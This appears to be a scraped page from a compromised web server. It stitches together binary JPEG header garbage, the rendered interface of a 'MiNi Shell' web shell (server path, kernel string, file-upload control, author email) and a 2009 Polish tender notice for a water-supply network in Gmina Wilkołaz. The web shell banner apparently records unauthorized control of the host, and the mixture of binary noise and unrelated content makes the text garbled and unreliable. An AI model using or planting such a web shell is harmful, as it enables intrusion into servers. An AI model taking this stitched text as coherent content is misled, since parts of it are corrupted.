JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090701/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090701/218400-N-2009.html

<p class="kh_header"><b>Wilkołaz Pierwszy: Budowa sieci wodociągowej wraz z przyłączami - Rozwiązanie  gospodarki  wodnej Gminy Wilkołaz etap II obejmujący miejscowości Zdrapy, Wilkołaz Pierwszy, Wilkołaz Górny i Wilkołaz Stacja  Kolejowa</b><br>
<b>Numer ogłoszenia: 218400 - 2009; data zamieszczenia: 01.07.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Wilkołaz , 9, 23-212 Wilkołaz Pierwszy, woj. lubelskie, tel. 081 8212001, 8212035, faks 081 8212695.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wilkolaz.lubelskie.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa sieci wodociągowej wraz z przyłączami - Rozwiązanie  gospodarki  wodnej Gminy Wilkołaz etap II obejmujący miejscowości Zdrapy, Wilkołaz Pierwszy, Wilkołaz Górny i Wilkołaz Stacja  Kolejowa.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest  Rozwiązanie  gospodarki  wodnej Gminy Wilkołaz etap II obejmujący miejscowości Zdrapy, Wilkołaz Pierwszy, Wilkołaz Górny i Wilkołaz Stacja  Kolejowa.
Zamówienie obejmuje:
a) sieć wodociągu grupowego Wilkołaz wraz z przyłączami w miejsc.: Zdrapy, Wilkołaz Pierwszy, Wilkołaz Górny i Wilkołaz Stacja Kolejowa.
Łączna długość sieci wodociągowej z rur PCV i PE na ciśnienie 1MPA wynosi 14735 m,  
w tym:
 PCW dz 160/6.2  - 9571 m
 PCW dz 110/4.2 -  4070 m
 PCW dz 90/4.3   -    414 m
PE 100SDR 11 dz 160/14,6 -  680m
Uzbrojenie sieci stanowić będą:
- hydranty p.poż nadziemne     dn   80  - 66 szt
- zasuwy żel-wod. kołnieżowe dn 150  - 31 szt
                                                  dn 100 - 10 szt
                                                  dn  80 -     3 szt
Przyłącza wodociągowe w ilości 161 szt wykonane  będą z rur PE# 100 na ciśnienie 1MPa łączonych na kształtki zaciskowe  gwintowane o łącznej długości  6872 m, 
w tym:
PE dz 63/3.8 ( dn(50)    - 1843  m
PE dz 40/2.4 (dn 32) -     5029 m
                                                               
-  przejście rurociągu pod  torami kolejowymi wykonane będzie  w stalowych rurach osłonowych dz 273,1 o długości 40.0 m dla przeciągnięcia rury  tłoczonej PE-100 SDR 11 dz 160/14.6 w km 35+448  zakładanych metodą przewiertu.
- przejścia pod drogami ,
- przejścia przez przeszkody terenowe,
-usunięcie i wykonanie wraz z zabezpieczeniem kolizji i skrzyżowań 
z gazociągami, kablem energetycznym, telefonicznym, urządzeniami melioracyjnymi, ciekami wodnymi, drogami i innymi przeszkodami terenowymi występującymi na trasie przyłączy zgodnie z projektem budowlano - wykonawczym, obowiązującymi normami i przepisami wraz  
z opłatami.
b) tyczenie i inwentaryzację powykonawczą wykonanej sieci wodociągowej,
c) sporządzenie  planu BIOZ,
d) wykonanie niezbędnych badań
2.  Zakres robót określony w ust. 1 winien być wykonany zgodnie z posiadaną dokumentacją techniczną, przedmiarem robót, pozwoleniem na budowę, specyfikacją techniczną wykonania 
i odbioru robót, przepisami prawa budowlanego, normami polskimi i sztuką budowlaną.
Wszystkie materiały potrzebne do wykonania w/w zadania zapewnia Wykonawca jak również obsługę geodezyjną.
Koszty te winny być uwzględnione we wskaźniku kosztów pośrednich jak 
i w kalkulacji ceny za roboty budowlane.
Wskazane w dokumentacji projektowej, przedmiarach i ST nazwy materiałów, urządzeń lub źródła pochodzenia należy rozumieć jako określenie wymaganych parametrów technicznych lub standardów jakościowych w rozumieniu na przykład takie jak .... Oznacza to zgodnie z art. 29 ust. 3 ustawy, że Zamawiający dopuszcza  składanie ofert równoważnych.
W takim przypadku wszelkie niezbędne uzgodnienia z autorem dokumentacji projektowej potwierdzające równoważność oferowanych urządzeń i materiałów 
w stosunku do wskazanych w projekcie należą do obowiązków Wykonawcy..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.23.43.00-8.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 1. Oferta musi być zabezpieczona wadium w wysokości    48.000,- zł (słownie: czterdzieści osiem tysięcy zł 00/100)
2. Wadium musi obejmować okres związania ofertą, tj. 30 dni .
3. Termin wniesienia wadium upływa dnia      22.07.2009 r.  godz. 10°°   .
4. Wadium może być wniesione w:
a)pieniądzu
b)poręczeniach bankowych lub poręczeniach Spółdzielczej Kasy Oszczędnościowo - Kredytowej, z tym że  poręczenie kasy jest zawsze poręczeniem pieniężnym
c)gwarancjach bankowych
d)gwarancjach ubezpieczeniowych
e)w poręczeniach udzielanych przez podmioty, o których mowa  w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 109 poz. 1158 z późn. zm.)
W przypadku wnoszenia wadium w pieniądzu ustaloną kwotę należy wpłacić przelewem na konto Zamawiającego BS  ZK o/ Wilkołaz  41 8717 1035 20022 0000 143 0004  najpóźniej 
w dacie składania ofert pieniądze muszą się znaleźć na koncie Zamawiającego.   Kserokopię dowodu wpłaty (polecenie przelewu) należy dołączyć do oferty.
W przypadku wnoszenia wadium w pozostałych dopuszczalnych formach - kopię poświadczoną za zgodność z oryginałem należy dołączyć do oferty. Ponadto do oferty należy dołączyć, w osobnej koszulce, oryginał tego dokumentu. Nie bindować i nie zszywać z ofertą. Z treści gwarancji ( poręczenia) musi  jednoznacznie wynikać, jaki jest sposób reprezentacji gwaranta. Gwarancja musi być  podpisana przez upoważnionego ( upełnomocnionego) przedstawiciela gwaranta. Podpis powinien być sporządzony w sposób czytelny umożliwiający jego identyfikację ( np. złożony wraz z imienna pieczątką  lub czytelny z podaniem  imienia i nazwiska). Z treści gwarancji  winno wynikać  bezwarunkowe, na każde pisemne żądanie zgłoszone przez Zamawiającego w terminie związania ofertą,  zobowiązanie gwaranta do wypłaty Zamawiającemu pełnej kwoty wadium określonych w art. 46 ust. 5 ustawy Prawo Zamówień Publicznych.

5. Nie wniesienie wadium w wymaganym terminie oraz wymaganej wysokości i formie skutkuje wykluczeniem Wykonawcy z postępowania.
 6. Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli -Wykonawca, którego oferta została wybrana:
a) odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie
b) nie wniósł zabezpieczenia należytego wykonania umowy,
c) zawarcie umowy w sprawie zamówienia publicznego stało się nie możliwe z przyczyn leżących po stronie wykonawcy.
7. Zamawiający również zatrzyma wadium, jeżeli Wykonawca w odpowiedzi na wezwanie do uzupełnienia dokumentów i oświadczeń na okoliczność spełnienia warunków udziału w postępowaniu nie złoży wymaganych  dokumentów z przyczyn leżących po jego stronie.
8. Zamawiający  zażąda, w wyznaczonym przez siebie terminie, ponownego wniesienia wadium  przez Wykonawców, którym zwrócono wadium na podstawie art. 46 ust. 3 pkt 2 i 3 Pzp, jeżeli w wyniku ostatecfznego rozstrzygnięcia protestu unieważniono czynność wykluczenia Wykonawcy lub odrzucenia oferty. 
9. Zamawiający dokona zwrotu wadium zgodnie z warunkami określonymi w art. 46 ustawy Pzp<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1) O zamówienie mogą ubiegać się wykonawcy, którzy:
a) posiadają uprawnienia do prowadzenia działalności gospodarczej w zakresie objętym przedmiotem niniejszego zamówienia ,
b) posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym 
i osobami zdolnymi do wykonania zamówienia,
c) znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia, 
d) nie podlegają wykluczeniu z postępowania o udzielenie zamówienia na podstawie art. 24 ustawy Pzp oraz spełniają warunki określone w art. 22 ust. 1 ustawy Pzp;
e) wykonali w okresie ostatnich 5 lat przed wszczęciem postępowania o udzielenie zamówienia 
a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadające swoim rodzajem i wartością roboty budowlane stanowiące przedmiot zamówienia, przy czym co najmniej 1 robota o minimalnej wartości 2.000.000 zł    w zakresie budowy  sieci wodociągowej wraz z przyłączami, jednocześnie potwierdzone, że zostały należycie wykonane,
f) posiadają polisę lub inny dokument ubezpieczenia potwierdzającego, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej  działalności gospodarczej,
g) wniosą wadium  w wymaganym terminie, wysokości i formie,
h) udzielą gwarancji na okres 36 miesięcy na wykonany przedmiot umowy,
i) spełniają pozostałe warunki zawarte w SIWZ.
2) Ocena spełniania w/w warunków dokonana zostanie zgodnie z formułą spełnia - nie spełnia na podstawie oświadczeń i dokumentów dołączonych przez wykonawcę do oferty zgodnie 
z postanowieniami SIWZ.
3) Nie spełnienie chociażby jednego z w/w warunków skutkować będzie wykluczeniem wykonawcy z postępowania a jego ofertę uzna się za odrzuconą.
4) Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia (np. w konsorcjum, spółki cywilne).
W takim przypadku ich oferta musi spełniać następujące wymagania:
a) wykonawcy przedłożą wraz z ofertą pełnomocnictwo wszystkich stron, (wymaga się solidarnej odpowiedzialności wykonawców). Każdy z wykonawców musi się podpisać pod pełnomocnictwem.
b) w odniesieniu do wymagań postawionych przez Zamawiającego, każdy z przedsiębiorców wchodzący w skład konsorcjum oddzielnie musi udokumentować, że nie podlega wykluczeniu na podstawie art. 24 ust. 1 pkt 1-9 ustawy Prawo zamówień publicznych,
c) oferta musi być podpisana w taki sposób, by prawnie zobowiązywała wszystkich wykonawców występujących wspólnie,
d) wykonawcy występujący wspólnie muszą ustanowić pełnomocnika (lidera) do reprezentowania ich w postępowaniu o udzielenie niniejszego zamówienia lub do reprezentowania ich w postępowaniu oraz zawarcia umowy o udzielenie przedmiotowego zamówienia publicznego. Pełnomocnika (lidera) należy wskazać w formularzu ofertowym. Umocowanie musi wynikać z treści pełnomocnictwa załączonego do oferty. Uwaga: treść pełnomocnictwa powinna dokładnie określać zakres umocowania.
e) wypełniając formularz ofertowy, jak również inne dokumenty powołujące się na wykonawcę; w miejscu np. nazwa i adres wykonawcy należy wpisać dane dotyczące konsorcjum, a nie pełnomocnika konsorcjum.
Uwaga: wszelka korespondencja oraz rozliczenia dokonywane będą wyłącznie 
z pełnomocnikiem (liderem).
6) Wykonawca może powierzyć część zakresu robót składających się na przedmiot zamówienia podwykonawcy.
Wówczas zobowiązany jest załączyć do oferty dokumenty określające, która część zakresu robót zostanie wykonana przez podwykonawcę ( zał. nr 6)
7) Wykonawca ponosi wszelkie koszty związane z przygotowaniem i złożeniem oferty..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1) Oferta musi zawierać następujące dokumenty i oświadczenia:

a) wypełniony formularz ofertowy z cenami wykonawcy - wg. załącznika nr 1,

b) oświadczenie, że wykonawca spełnia warunki udziału w postępowaniu, określone w art. 22 ust 1 ustawy i nie podlega wykluczeniu z postępowania na podstawie art. 24 ust 1 i 2 - załącznik nr 2,
c) aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawionych nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,

d) aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, opłat lub, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności, lub wstrzymanie w całości wykonania decyzji organu podatkowego wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert,

e) aktualne zaświadczenie z właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem opłat, składek na ubezpieczenia zdrowotne lub społeczne, lub, że uzyskał przewidziane prawem zwolnienie , odroczenie lub rozłożenie na raty zaległych płatności wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert,

f) aktualną informację z Krajowego Rejestru Karnego w zakresie określonym art. 24.ust.1 pkt 4-8 ustawy Prawo Zamówień Publicznych - wystawionej nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert ( informacja oddzielnie dotyczy osób fizycznych - właścicieli, współwłaścicieli, oddzielnie dotyczy urzędujących członków władz osób prawnych),

g) wskazanie osób, które będą pełniły funkcję kierownika budowy przy realizacji w/w zadania (wg. załącznika nr 4). Wykonawca musi załączyć kserokopie uprawnień budowlanych wraz z aktualną informacją o przynależności do właściwej Okręgowej Izby Inżynierów Budownictwa,

h) kosztorys ofertowy , który będzie obejmować zakres robót wynikających z przedmiarów robót stanowiących  załącznik nr 5 do SIWZ 

i)   informacje na temat wykonanych  inwestycji w okresie ostatnich 5 lat przed wszczęciem  postępowania o udzielenie zamówienia publicznego, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadające swoim rodzajem i wartością roboty budowlane stanowiące przedmiot zamówienia, z podaniem ich wartości oraz daty i miejsca wykonywania oraz załączeniem dokumentów, że roboty zostały wykonane należycie, przy czym co najmniej 
1 robota o minimalnej wartości 2.000.000 zł w zakresie budowy  sieci wodociągowej wraz z przyłączami, według załączonego formularza - załącznik nr 3 do SIWZ,

j) informację banku  prowadzącego rachunek bankowy Wykonawcy, w której potwierdza się posiadanie środków finansowych lub zdolność kredytową. 
(w wysokości nie mniejszej niż  1.500.000,- PLN), wystawionej nie wcześniej niż 3 miesięcy przed upływem terminu składania ofert,

k) polisę lub inny dokument ubezpieczenia potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzenia  działalności gospodarczej  obejmujący okres  realizacji zamówienia.

Ponadto do oferty należy dołączyć:
-	oświadczenie Wykonawcy o udzieleniu gwarancji na okres  36 miesięcy ( na formularzu ofertowym),
-	wykaz prac zleconych  do wykonania podwykonawcom ( zał. nr 6   do SIWZ)
2) Wykonawca zamieszkały poza terytorium Rzeczypospolitej Polskiej

2.1) Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w pkt. 1 ppkt. c, d, e , składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:
a) nie otwarto jego likwidacji ani nie ogłoszono upadłości,
b) nie zalega z uiszczaniem podatków, opłat lub składek na ubezpieczenie społeczne lub zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu,
c) nie orzeczono wobec niego zakazu ubiegania się o zamówienie.

UWAGA!

W przypadku składania oferty wspólnej przez kilku przedsiębiorców każdy ze wspólników musi złożyć dokumenty wymienione w punktach od b do e. Pozostałe dokumenty będą traktowane jako wspólne.
3) Dokumenty należy przedstawić w formie oryginału lub kopii poświadczonych za zgodność z oryginałem przez upełnomocnionego przedstawiciela Wykonawcy.
Wszystkie dokumenty wystawione w języku innym niż polski muszą być  złożone w formie tłumaczenia dokonanego przez tłumacza, opatrzone jego podpisem i pieczęcią.
4) Zamawiający wzywa wykonawców, którzy w określonym terminie nie złożyli oświadczeń i dokumentów potwierdzających spełnianie warunków udziału w postępowaniu lub którzy złożyli dokumenty zawierające błędy, do ich uzupełnienia w wyznaczonym terminie, chyba że mimo ich uzupełnienia konieczne byłoby unieważnienie postępowania. Zamawiający wzywa także, w wyznaczonym przez siebie terminie, do złożenia wyjaśnień dotyczących oświadczeń i dokumentów, o których mowa w art. 25 ust. 1 ustawy Pzp.
Złożone na  wezwanie Zamawiającego dokumenty i oświadczenia powinny potwierdzać spełnienie warunków udziału w postępowaniu nie później niż w dniu, w którym upłynął termin składania ofert..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.wilkolaz.bip lublin.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Gmina Wilkołaz
Wilkołaz Pierwszy 9
23-212 Wilkołaz.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.07.2009 godzina 10:00, miejsce: Gmina Wilkołaz
Wilkołaz Pierwszy 9
23-212 Wilkołaz.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com